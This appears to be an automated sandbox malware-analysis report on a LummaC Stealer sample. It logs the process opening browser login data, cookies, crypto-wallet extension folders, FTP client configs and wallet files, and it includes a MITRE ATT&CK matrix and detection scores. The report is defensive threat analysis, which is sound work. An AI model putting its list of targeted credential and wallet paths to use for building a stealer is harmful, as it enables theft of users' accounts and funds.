Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Installer.exe.35f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Installer.exe.35f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	2 Windows Management Instrumentation	1 Scripting	1 Access Token Manipulation	11 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Input Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	311 Process Injection	1 Access Token Manipulation	11 Input Capture	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	24 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	311 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	31 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	14 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	46 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	32%	ReversingLabs
file.exe	14%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\main\7z.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\main\7z.exe	0%	ReversingLabs
